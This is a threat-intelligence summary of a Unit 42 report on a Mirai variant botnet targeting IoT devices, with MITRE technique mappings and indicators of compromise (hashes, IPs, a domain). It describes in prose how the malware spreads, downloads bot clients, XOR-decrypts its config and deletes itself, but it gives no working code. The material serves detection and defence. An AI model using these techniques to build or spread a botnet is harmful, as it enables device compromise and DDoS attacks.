Unit 42 outlines a Mirai variant campaign targeting IoT devices since March 2023, exploiting a wide set of IoT vulnerabilities to recruit devices into a botnet used for DDoS and other attacks. The campaigns share infrastructure and malware characteristics, with protections available from Palo Alto Networks and collaboration with the Cyber Threat Alliance. #Mirai #IZ1H9 #V3G4 #Zeroshell #DLink #NagiosXI #TP-LinkArcher
Keypoints
- Unit 42 observed threat actors using several IoT vulnerabilities to spread a Mirai variant since March 2023.
- The malware uses a shell script downloader to fetch bot clients for multiple Linux architectures and then deletes itself to cover tracks.
- Campaigns appear to share infrastructure and nearly identical botnet samples, linking multiple campaigns to the same actor (IP sources include 185.44.81.114 and 193.32.162.189).
- The variant decrypts its configuration with a fixed key (0xDEADBEEF) to generate a 0x22 key and then XORs encrypted data (encrypted_char ^ 0x22 = decrypted_char).
- telnet brute-force attempts and exploitation of numerous CVEs across many IoT devices enabled the spread beyond initial access.
- Palo Alto Networks describes mitigations including IoT security, ML-based detection, WildFire, URL filtering, and CTA collaboration to disrupt actors.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The threat actors exploit multiple IoT device vulnerabilities to run remote commands and download/execute bot clients (‘remote command execution exploit traffic’ and ‘shell script downloader would download and execute the bot clients to accommodate different Linux architectures’).
- [T1105] Ingress Tool Transfer – The shell script downloader downloads bot clients to accommodate various architectures and then executes them.
- [T1059.004] Command and Scripting Interpreter – The shell script downloader and subsequent bot clients rely on shell scripting to run on Linux devices (‘shell script downloader’).
- [T1027] Obfuscated/Encoded Files or Information – The configuration is decrypted using a fixed key (0xDEADBEEF) to produce a 0x22 key and XOR-decrypts the config (‘encrypted_char ^ 0x22 = decrypted_char’).
- [T1070.004] File Deletion – The shell script downloader deletes the downloaded bot client to cover its tracks (‘delete the client executable file to cover its tracks’).
- [T1110] Brute Force – Telnet brute-force attempts reported from 185.44.81.114 indicate credential guessing as an initial access step.
- [T1499] Denial of Service – Botnet traffic is used to conduct DDoS and other disruptive attacks once devices are compromised.
Indicators of Compromise
- [File Hash] Shell Script Downloader Samples – 888f4a852642ce70197f77e213456ea2b3cfca4a592b94647827ca45adf2a5b8
- [File Hash] Mirai Samples – b43a8a56c10ba17ddd6fa9a8ce10ab264c6495b82a38620e9d54d66ec8677b0c
- [File Hash] Mirai Samples – b45142a2d59d16991a38ea0a112078a6ce42c9e2ee28a74fb2ce7e1edf15dce3
- [Domain] Command infrastructure – zvub.us
- [IP Address] 185.44.81.114 – observed as campaign source (Oct 2022–Mar 2023)
- [IP Address] 185.225.74.251 – campaign activity after Mar 2023
- [IP Address] 193.32.162.189 – another campaign source
- [File Name] y – shell script downloader file name referenced in the campaign
Read more: https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/